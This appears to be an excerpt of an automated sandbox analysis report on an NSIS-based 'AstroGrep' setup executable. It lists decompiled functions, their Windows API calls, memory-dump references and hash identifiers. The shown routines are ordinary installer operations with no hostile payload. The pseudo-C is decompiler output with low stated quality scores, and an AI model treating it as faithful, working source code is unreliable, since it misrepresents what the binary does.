                                                                                                            0x0040241e
                                                                                                            0x00402425
                                                                                                            0x00402427
                                                                                                            0x004026a6
                                                                                                            0x0040242d
                                                                                                            0x00402430
                                                                                                            0x00402440
                                                                                                            0x0040244b
                                                                                                            0x0040247b
                                                                                                            0x0040247b
                                                                                                            0x0040247d
                                                                                                            0x0040244d
                                                                                                            0x00402451
                                                                                                            0x0040246a
                                                                                                            0x00402471
                                                                                                            0x00402474
                                                                                                            0x00402453
                                                                                                            0x00402456
                                                                                                            0x00402461
                                                                                                            0x004024d1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402456
                                                                                                            0x00402451
                                                                                                            0x004024d7
                                                                                                            0x004024d8
                                                                                                            0x004024d8
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                            • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 2fc456f067d7d2b16c5da38b508f8d43353395dda029af5291feda3b0f4e887d
                                                                                                            • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                                            • Opcode Fuzzy Hash: 2fc456f067d7d2b16c5da38b508f8d43353395dda029af5291feda3b0f4e887d
                                                                                                            • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 59%
                                                                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42e430;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42dbec =  *0x42dbec + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42dbec, 0x7530,  *0x42dbd4), 0); // executed
					}
				}
				return 0;
			}











                                                                                                            0x0040138a
                                                                                                            0x004013fa
                                                                                                            0x0040139b
                                                                                                            0x004013a0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004013a2
                                                                                                            0x004013a3
                                                                                                            0x004013ad
                                                                                                            0x00000000
                                                                                                            0x00401404
                                                                                                            0x004013b0
                                                                                                            0x004013b7
                                                                                                            0x004013bd
                                                                                                            0x004013be
                                                                                                            0x004013c0
                                                                                                            0x004013c2
                                                                                                            0x004013b9
                                                                                                            0x004013b9
                                                                                                            0x004013ba
                                                                                                            0x004013ba
                                                                                                            0x004013c9
                                                                                                            0x004013cb
                                                                                                            0x004013f4
                                                                                                            0x004013f4
                                                                                                            0x004013c9
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                            • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                                            • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                                            • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040501A, Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E0040501A(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x42e428;
				_t10 =  *0x42e42c;
				__imp__OleInitialize(0);
				 *0x42e4b8 =  *0x42e4b8 | __eax;
				E00403F60(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					while(1) {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
							break;
						}
						_t12 = _t12 + 0x418;
						if(_t10 != 0) {
							continue;
						} else {
						}
						goto L7;
					}
					 *0x42e48c =  *0x42e48c + 1;
				}
				L7:
				E00403F60(0x404); // executed
				__imp__OleUninitialize(); // executed
				return  *0x42e48c;
			}







                                                                                                            0x0040501b
                                                                                                            0x00405022
                                                                                                            0x0040502a
                                                                                                            0x00405030
                                                                                                            0x00405038
                                                                                                            0x0040503f
                                                                                                            0x00405041
                                                                                                            0x00405044
                                                                                                            0x00405044
                                                                                                            0x00405049
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040505a
                                                                                                            0x00405062
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405064
                                                                                                            0x00000000
                                                                                                            0x00405062
                                                                                                            0x00405066
                                                                                                            0x00405066
                                                                                                            0x0040506c
                                                                                                            0x00405071
                                                                                                            0x00405076
                                                                                                            0x00405083

                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040502A
                                                                                                              • Part of subcall function 00403F60: SendMessageA.USER32(0008003A,00000000,00000000,00000000), ref: 00403F72
                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 00405076
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2896919175-0
                                                                                                            • Opcode ID: 24ebda43c93c3a0e79a2719f9d73c458f4bc0a47607411017357536a7f3aecb3
                                                                                                            • Instruction ID: 3bb1638c4cb192e16dfd02cc67da28ccb22f822f40d61e8a5dd6919248452ec0
                                                                                                            • Opcode Fuzzy Hash: 24ebda43c93c3a0e79a2719f9d73c458f4bc0a47607411017357536a7f3aecb3
                                                                                                            • Instruction Fuzzy Hash: 79F02473A041018BE3616B259C00B5B77A0EB88301F14003AFE44732E1DA3A59028AAE
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004060C8, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004060C8(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409240);
				_t5 = GetModuleHandleA( *(_t10 + 0x409240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x409244));
				}
				_t5 = E0040605A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                            0x004060d0
                                                                                                            0x004060d3
                                                                                                            0x004060da
                                                                                                            0x004060e2
                                                                                                            0x004060ee
                                                                                                            0x00000000
                                                                                                            0x004060f5
                                                                                                            0x004060e5
                                                                                                            0x004060ec
                                                                                                            0x00000000
                                                                                                            0x004060fd
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                              • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32 ref: 00406071
                                                                                                              • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                                              • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                            • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                                            • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                            • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004028AA, Relevance: 3.0, APIs: 2, Instructions: 21windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004028AA(signed int __eax) {
				RECT* _t10;
				signed int _t12;
				void* _t16;

				_t12 =  *0x42a868; // 0x1
				SendMessageA( *(_t16 - 8), 0xb, _t12 & __eax, _t10); // executed
				if( *((intOrPtr*)(_t16 - 0x28)) != _t10) {
					InvalidateRect( *(_t16 - 8), _t10, _t10);
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t16 - 4));
				return 0;
			}






                                                                                                            0x004028aa
                                                                                                            0x004028b9
                                                                                                            0x004028c2
                                                                                                            0x004028c9
                                                                                                            0x004028c9
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,0000000B,00000001), ref: 004028B9
                                                                                                            • InvalidateRect.USER32(?), ref: 004028C9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: InvalidateMessageRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 909852535-0
                                                                                                            • Opcode ID: aeb50c85f6bd4643b9d68925b2460725ce61c84df534f36f5868be4476b80fa0
                                                                                                            • Instruction ID: be23d6fc8d776c2babc1d674e4d633496abb7596598885af0ff4512d456a32a5
                                                                                                            • Opcode Fuzzy Hash: aeb50c85f6bd4643b9d68925b2460725ce61c84df534f36f5868be4476b80fa0
                                                                                                            • Instruction Fuzzy Hash: 8EE08C72B00008AFEB11DF94EC849AEBBB9EB40319F10003AF202B10A0D3301C52EA38
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401DBE, Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DD4
                                                                                                            • KiUserCallbackDispatcher.NTDLL(00000000,00000000), ref: 00401DDF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherShowUserWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 82835404-0
                                                                                                            • Opcode ID: 631860118f17632e048306a62bf20ea73867afe44b58029fb558df6f2f837031
                                                                                                            • Instruction ID: c8fe5530bc3a284fb496cf405a900608927f238f86a8d8635fe2229634aa8b82
                                                                                                            • Opcode Fuzzy Hash: 631860118f17632e048306a62bf20ea73867afe44b58029fb558df6f2f837031
                                                                                                            • Instruction Fuzzy Hash: C0E08C32A041009BEB20FBB5AA488AE33659B50369B204437E102F25D1C6B89C429E3A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004059A2, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E004059A2(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                            0x004059a6
                                                                                                            0x004059b3
                                                                                                            0x004059c8
                                                                                                            0x004059ce

                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE,80000000,00000003), ref: 004059A6
                                                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                            • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                                            • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                            • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040597D, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040597D(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                                                                            0x00405982
                                                                                                            0x00405988
                                                                                                            0x0040598d
                                                                                                            0x00405996
                                                                                                            0x00405996
                                                                                                            0x0040599f

                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405996
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                            • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                                                                            • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                                            • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004035D5, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E004035D5() {
				void* _t1;
				void* _t3;
				signed int _t6;

				_t1 =  *0x409018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409018 =  *0x409018 | 0xffffffff;
					_t6 =  *0x409018;
				}
				E0040361A();
				_t3 = E004055D1(_t6, "C:\\Users\\hardz\\AppData\\Local\\Temp\\nsq211B.tmp\\", 7); // executed
				return _t3;
			}






                                                                                                            0x004035d5
                                                                                                            0x004035dd
                                                                                                            0x004035e0
                                                                                                            0x004035e6
                                                                                                            0x004035e6
                                                                                                            0x004035e6
                                                                                                            0x004035ed
                                                                                                            0x004035f9
                                                                                                            0x004035fe

                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,0040340C,?), ref: 004035E0
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\nsq211B.tmp\, xrefs: 004035F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\
                                                                                                            • API String ID: 2962429428-3865883443
                                                                                                            • Opcode ID: b4e71e5da018f29a942a103bdf59fc510cec2df476782853edbd034567b71d58
                                                                                                            • Instruction ID: 0f8781e1bbdd9c2adc6ca0ac5482970d0aa05edb5ea4ec715affa2ba15943bce
                                                                                                            • Opcode Fuzzy Hash: b4e71e5da018f29a942a103bdf59fc510cec2df476782853edbd034567b71d58
                                                                                                            • Instruction Fuzzy Hash: 58C01230504A00B7C1386F789D4A9053A546740336BE44765B4B5B15F2C73C5A85956D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040548B, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040548B(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                            0x00405491
                                                                                                            0x00405499
                                                                                                            0x00000000
                                                                                                            0x0040549f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                                            • GetLastError.KERNEL32 ref: 0040549F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                            • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                                                            • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                            • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040265E, Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 41%
                                                                                                            			E0040265E(char __ebx, char* __esi) {
				void* _t5;
				int _t8;
				char _t11;
				void* _t13;
				void* _t15;
				void* _t19;

				_t17 = __esi;
				_t11 = __ebx;
				_t5 = E00405CA6(_t13, _t15);
				if(_t5 == __ebx) {
					L2:
					 *((intOrPtr*)(_t19 - 4)) = 1;
					 *_t17 = _t11;
				} else {
					_t8 = FindNextFileA(_t5, _t19 - 0x1a4); // executed
					if(_t8 != 0) {
						_push(_t19 - 0x178);
						_push(__esi);
						E00405D2F();
					} else {
						goto L2;
					}
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}









                                                                                                            0x0040265e
                                                                                                            0x0040265e
                                                                                                            0x0040265f
                                                                                                            0x00402666
                                                                                                            0x0040267a
                                                                                                            0x0040267a
                                                                                                            0x00402681
                                                                                                            0x00402668
                                                                                                            0x00402670
                                                                                                            0x00402678
                                                                                                            0x004026bf
                                                                                                            0x004026c0
                                                                                                            0x004027f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00402678
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • FindNextFileA.KERNELBASE(00000000,?), ref: 00402670
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FileFindNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2029273394-0
                                                                                                            • Opcode ID: aeb2cb0fec585eae4c491a65588537bed9944789986222d2921ea485206fe541
                                                                                                            • Instruction ID: 40327f167f56cc920aeb651fb5f2ad05af9efb3577a6d189e0bd99497a83f7e5
                                                                                                            • Opcode Fuzzy Hash: aeb2cb0fec585eae4c491a65588537bed9944789986222d2921ea485206fe541
                                                                                                            • Instruction Fuzzy Hash: 3AE0E5326041008BF710EBA1DD48AAE73A8DF10304F20447BD201E21C0E2B94985AB3A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402616, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 44%
                                                                                                            			E00402616(void* __eflags) {
				long _t6;
				long _t8;
				LONG* _t10;
				void* _t12;
				void* _t15;
				void* _t17;

				_push(ds);
				if(__eflags != 0) {
					_t6 = E00402A1D(2);
					_t8 = SetFilePointer(E00405CA6(_t12, _t15), _t6, _t10,  *(_t17 - 0x1c)); // executed
					if( *((intOrPtr*)(_t17 - 0x24)) >= _t10) {
						_push(_t8);
						E00405C8D();
					}
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                            0x00402616
                                                                                                            0x00402617
                                                                                                            0x00402623
                                                                                                            0x00402630
                                                                                                            0x00402639
                                                                                                            0x00402875
                                                                                                            0x00402877
                                                                                                            0x00402877
                                                                                                            0x00402639
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630
